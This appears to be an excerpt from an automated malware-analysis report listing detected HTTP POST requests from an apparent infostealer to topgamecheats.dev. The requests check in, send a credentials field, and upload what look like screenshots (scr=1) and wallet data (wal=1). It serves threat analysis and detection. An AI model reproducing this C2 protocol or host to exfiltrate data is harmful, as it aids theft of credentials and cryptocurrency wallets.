Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?wal=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----NjE0Mw==Host: topgamecheats.devContent-Length: 6303Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwMTY3Host: topgamecheats.devContent-Length: 100319Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTc4ODA=Host: topgamecheats.devContent-Length: 98032Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 160Cache-Control: no-cacheData Raw: 72 3d 39 38 37 42 37 30 42 34 41 34 34 41 41 31 35 46 43 36 33 44 30 30 44 38 31 38 35 35 42 41 44 42 35 36 36 35 35 32 39 31 45 38 41 41 46 46 37 30 42 46 38 35 38 30 32 46 46 33 37 42 45 44 41 33 41 35 37 32 38 34 35 35 41 46 32 37 33 39 44 37 43 34 33 38 36 37 42 42 34 32 38 37 34 41 33 39 37 44 34 44 35 34 36 38 33 36 35 46 46 46 39 39 32 42 39 37 33 30 37 30 45 43 39 42 35 39 36 46 34 38 34 46 41 44 34 34 37 45 37 38 44 43 37 39 39 44 43 32 45 39 35 36 37 42 35 45 38 30 Data Ascii: r=987B70B4A44AA15FC63D00D81855BADB56655291E8AAFF70BF85802FF37BEDA3A5728455AF2739D7C43867BB42874A397D4D5468365FFF992B973070EC9B596F484FAD447E78DC799DC2E9567B5E80
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTgyNDQ=Host: topgamecheats.devContent-Length: 98396Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: topgamecheats.devContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
